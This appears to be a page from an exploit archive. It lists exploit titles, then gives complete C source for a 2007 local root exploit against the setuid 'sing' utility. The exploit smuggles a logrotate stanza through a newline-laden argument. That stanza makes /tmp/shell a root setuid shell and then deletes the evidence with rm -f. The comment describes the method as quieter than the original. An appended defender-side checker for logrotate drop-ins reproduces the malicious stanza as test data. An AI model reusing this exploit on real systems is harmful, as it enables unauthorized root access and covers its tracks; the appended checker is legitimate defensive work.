
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities
My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities
Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities
cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities
DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities
N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities
New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities
Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities
i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities
My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities
Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities
Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities
KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities
Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability
xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
58 lines
1.5 KiB
C
Executable file
/*
    sing file append exploit
    by bannedit

    12/05/2007

    The original reporter of this issue included an example session which
    added an account to the machine.

    The method for this exploit is slightly different and much more
    quiet. Although it relies upon logrotate for help.

    This could easily be modified to work with cron daemons which
    are not too strict about the cron file format. However,
    when I tested vixie cron it appears that there are
    better checks for file format compliance these days.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define SING_PATH "/usr/bin/sing"

char *file = "/etc/logrotate.d/sing";
char *evilname = "\n/tmp/sing {\n daily\n size=0\n firstaction\n chown root /tmp/shell; chmod 4755 /tmp/shell; rm -f /etc/logrotate.d/sing; rm -f /tmp/sing*\n endscript\n}\n\n\n";

int main()
{
    FILE *fp;
    int pid;

    puts("sing file append exploit");
    puts("------------------------");
    puts("by bannedit");

    if(fp = fopen("/tmp/shell", "w+"))
    {
        fputs("#!/bin/bash\n", fp);
        fputs("/bin/bash -p", fp);
        fclose(fp);
        system("touch /tmp/sing; echo garbage >> /tmp/sing");
    }
    else
    {
        puts("error making shell file");
        exit(-1);
    }

    sleep(5);
    printf("done sleeping...\n");
    execl(SING_PATH, evilname, "-Q", "-c", "1", "-L", file, "localhost", 0);
    return 0;
}

// milw0rm.com [2007-12-06]
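A defender-side check for the kind of logrotate drop-in this file plants, added here as an example and not part of the original exploit or of logrotate: it counts stanza headers and script-block commands that reference a world-writable path. The function name audit_logrotate, the directory list and both sample configs are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Directories any local user can write to (list assumed for this example). */
static const char *WRITABLE[] = { "/tmp/", "/var/tmp/", "/dev/shm/" };
/* logrotate directives that open a shell block closed by "endscript". */
static const char *OPENERS[] = { "firstaction", "lastaction", "prerotate",
                                 "postrotate", "preremove" };
/* Constructed samples: a drop-in shaped like the one on this page, and a benign one. */
static const char TAMPERED[] = "garbage\n/tmp/sing {\n daily\n size=0\n firstaction\n"
    " chown root /tmp/shell; chmod 4755 /tmp/shell\n endscript\n}\n";
static const char BENIGN[] = "/var/log/app/*.log {\n weekly\n postrotate\n"
    " /usr/bin/systemctl reload app\n endscript\n}\n";

/* 1 if the n-byte line s contains any world-writable directory prefix. */
static int mentions_writable(const char *s, size_t n) {
    for (size_t i = 0; i < sizeof WRITABLE / sizeof *WRITABLE; i++) {
        size_t k = strlen(WRITABLE[i]);
        for (size_t j = 0; j + k <= n; j++)
            if (memcmp(s + j, WRITABLE[i], k) == 0) return 1;
    }
    return 0;
}

/* Count script-block commands and stanza headers ("path {") naming a writable path. */
int audit_logrotate(const char *text) {
    int findings = 0, in_script = 0;
    while (*text) {
        size_t n = strcspn(text, "\n"), len = n;
        const char *p = text;
        while (len && (*p == ' ' || *p == '\t')) { p++; len--; }
        if (in_script) {
            if (len >= 9 && memcmp(p, "endscript", 9) == 0) in_script = 0;
            else findings += mentions_writable(p, len);
        } else {
            int opened = 0;
            for (size_t i = 0; i < sizeof OPENERS / sizeof *OPENERS; i++)
                if (strncmp(p, OPENERS[i], strlen(OPENERS[i])) == 0) opened = 1;
            if (opened) in_script = 1;
            else if (len && p[len - 1] == '{') findings += mentions_writable(p, len);
        }
        text += n + (text[n] == '\n');
    }
    return findings;
}

int main(void) {
    printf("tampered: %d, benign: %d\n", audit_logrotate(TAMPERED), audit_logrotate(BENIGN));
    return 0;
}
```

A non-zero count on any file under /etc/logrotate.d is worth a manual look, together with the file's owner and modification time.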